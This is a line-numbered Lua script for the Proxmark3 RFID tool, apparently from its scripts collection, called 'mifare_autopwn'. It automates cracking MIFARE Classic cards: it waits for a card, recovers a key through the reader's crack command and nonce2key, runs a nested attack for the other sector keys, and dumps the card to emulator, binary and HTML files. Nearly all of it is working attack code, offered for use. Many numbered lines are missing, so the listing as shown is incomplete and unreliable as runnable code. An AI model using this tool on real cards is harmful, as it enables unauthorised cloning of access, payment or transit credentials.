1 local getopt = require('getopt')
2 local reader = require('read14a')
3 local cmds = require('commands')
5 example = "script run mifare_autopwn"
6 author = "Martin Holst Swende"
11 This is a which automates cracking and dumping mifare classic cards. It sets itself into
12 'listening'-mode, after which it cracks and dumps any mifare classic card that you
19 Output files from this operation:
20 <uid>.eml - emulator file
21 <uid>.html - html file containing card data
22 dumpkeys.bin - keys are dumped here. OBS! This file is volatile, as other commands overwrite it sometimes.
23 dumpdata.bin - card data in binary form. OBS! This file is volatile, as other commands (hf mf dump) overwrite it.
27 -------------------------------
29 -------------------------------
32 -- A debug printout-function
39 -- This is only meant to be used when errors occur
49 print("Example usage")
54 -- Waits for a mifare card to be placed within the vicinity of the reader.
55 -- @return if successfull: an table containing card info
56 -- @return if unsuccessfull : nil, error
57 function wait_for_mifare()
58 while not core.ukbhit() do
59 res, err = reader.read1443a()
60 if res then return res end
61 -- err means that there was no response from card
63 return nil, "Aborted by user"
67 core.clearCommandBuffer()
68 -- Build the mifare-command
69 local cmd = Command:new{cmd = cmds.CMD_READER_MIFARE, arg1 = 1}
73 core.SendCommand(cmd:getBytes())
74 local key, errormessage = mfcrack_inner()
76 if key then return key end
78 if errormessage then return nil, errormessage end
79 -- Try again..set arg1 to 0 this time.
81 cmd = Command:new{cmd = cmds.CMD_READER_MIFARE, arg1 = 0}
83 return nil, "Aborted by user"
87 function mfcrack_inner()
88 while not core.ukbhit() do
89 local result = core.WaitForResponseTimeout(cmds.CMD_ACK,1000)
91 -- Unpacking the three arg-parameters
92 local count,cmd,isOK = bin.unpack('LL',result)
94 if isOK ~= 1 then return nil, "Error occurred" end
97 -- The data-part is left
98 -- Starts 32 bytes in, at byte 33
99 local data = result:sub(33)
102 local get = function(num)
103 local x = data:sub(1,num)
104 data = data:sub(num+1)
108 local uid,nt,pl = get(4),get(4),get(8)
109 local ks,nr = get(8),get(4)
111 local status, key = core.nonce2key(uid,nt, nr, pl,ks)
112 if not status then return status,key end
115 print("Key not found (lfsr_common_prefix problem)")
123 return nil, "Aborted by user"
126 function nested(key,sak)
128 if 0x18 == sak then --NXP MIFARE Classic 4k | Plus 4k
130 elseif 0x08 == sak then -- NXP MIFARE CLASSIC 1k | Plus 2k
132 elseif 0x09 == sak then -- NXP MIFARE Mini 0.3k
134 elseif 0x10 == sak then-- "NXP MIFARE Plus 2k"
137 print("I don't know how many sectors there are on this type of card, defaulting to 16")
139 local cmd = string.format("hf mf nested %d 0 A %s d",typ,key)
144 core.console("hf mf dump")
145 -- Save the global args, those are *our* arguments
147 -- Set the arguments for htmldump script
148 args =("-o %s.html"):format(uid)
150 require('../scripts/htmldump')
154 require('../scripts/dumptoemul')
155 -- Set back args. Not that it's used, just for the karma...
160 -- The main entry point
164 local verbose, exit,res,uid,err,_,sak
167 -- Read the parameters
168 for o, a in getopt.getopt(args, 'hd') do
169 if o == "h" then help() return end
170 if o == "d" then DEBUG = true end
174 res, err = wait_for_mifare()
175 if err then return oops(err) end
179 if not seen_uids[uid] then
182 print("Card found, commencing crack", uid)
186 if not res then return oops(err) end
187 -- The key is actually 8 bytes, so a
188 -- 6-byte key is sent as 00XXXXXX
189 -- This means we unpack it as first
190 -- two bytes, then six bytes actual key data
191 -- We can discard first and second return values
192 _,_,key = bin.unpack("H2H6",res)